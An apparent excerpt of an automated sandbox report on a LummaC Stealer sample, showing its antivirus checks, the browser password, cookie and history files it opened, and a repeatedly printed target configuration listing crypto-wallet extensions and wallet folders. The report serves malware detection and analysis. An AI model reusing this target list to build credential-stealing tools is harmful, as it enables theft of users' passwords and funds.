                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00B0EB28
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: GetLocaleInfoW,0_2_00B0A5EC
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: EnumSystemLocalesW,0_2_00B0ED79
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00B0EE14
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: GetLocaleInfoW,2_2_00B0F0C6
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: EnumSystemLocalesW,2_2_00B0F067
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: EnumSystemLocalesW,2_2_00B0F19B
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: GetLocaleInfoW,2_2_00B0F1E6
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00B0F28D
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: EnumSystemLocalesW,2_2_00B0AAE7
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: GetLocaleInfoW,2_2_00B0F393
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00B0EB28
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: GetLocaleInfoW,2_2_00B0A5EC
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: EnumSystemLocalesW,2_2_00B0ED79
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00B0EE14
                Source: C:\Users\user\Desktop\YuQuLoader.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AFE1B7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00AFE1B7
                Source: C:\Users\user\Desktop\YuQuLoader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: YuQuLoader.exe, 00000002.00000003.1589161023.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.2281775976.00000000015C3000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1651675961.00000000015C3000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589579772.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589161023.00000000015C3000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1651675961.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000002.2618150185.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589446063.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681524125.00000000015C3000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1652000979.00000000015DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\YuQuLoader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: 2.2.YuQuLoader.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.YuQuLoader.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2617683051.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: YuQuLoader.exe, 00000002.00000003.1557228002.0000000001640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Armory","m":["*.wallet"],"z":"Wallets/Armory","d":1,"fs":20971520},{"t":0,"p":"%localappdata%\\Coinomi\\Coinomi\\wallets","m":["*"],"z":"Wallets/Coinomi","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Authy Desktop\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":["*.dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},
                Source: YuQuLoader.exe, 00000002.00000003.1557228002.0000000001640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Armory","m":["*.wallet"],"z":"Wallets/Armory","d":1,"fs":20971520},{"t":0,"p":"%localappdata%\\Coinomi\\Coinomi\\wallets","m":["*"],"z":"Wallets/Coinomi","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Authy Desktop\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":["*.dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},
                Source: YuQuLoader.exe, 00000002.00000003.1557228002.0000000001640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: YuQuLoader.exe, 00000002.00000003.1557228002.0000000001640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Armory","m":["*.wallet"],"z":"Wallets/Armory","d":1,"fs":20971520},{"t":0,"p":"%localappdata%\\Coinomi\\Coinomi\\wallets","m":["*"],"z":"Wallets/Coinomi","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Authy Desktop\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":["*.dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},
                Source: YuQuLoader.exe, 00000002.00000003.1557228002.0000000001640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Armory","m":["*.wallet"],"z":"Wallets/Armory","d":1,"fs":20971520},{"t":0,"p":"%localappdata%\\Coinomi\\Coinomi\\wallets","m":["*"],"z":"Wallets/Coinomi","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Authy Desktop\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":["*.dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},
                Source: YuQuLoader.exe, 00000002.00000003.1557228002.0000000001640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                Source: YuQuLoader.exe, 00000002.00000003.1557228002.0000000001640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Armory","m":["*.wallet"],"z":"Wallets/Armory","d":1,"fs":20971520},{"t":0,"p":"%localappdata%\\Coinomi\\Coinomi\\wallets","m":["*"],"z":"Wallets/Coinomi","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Authy Desktop\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":["*.dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},
                Source: YuQuLoader.exe, 00000002.00000003.1557228002.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: YuQuLoader.exe, 00000002.00000003.1557228002.0000000001640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
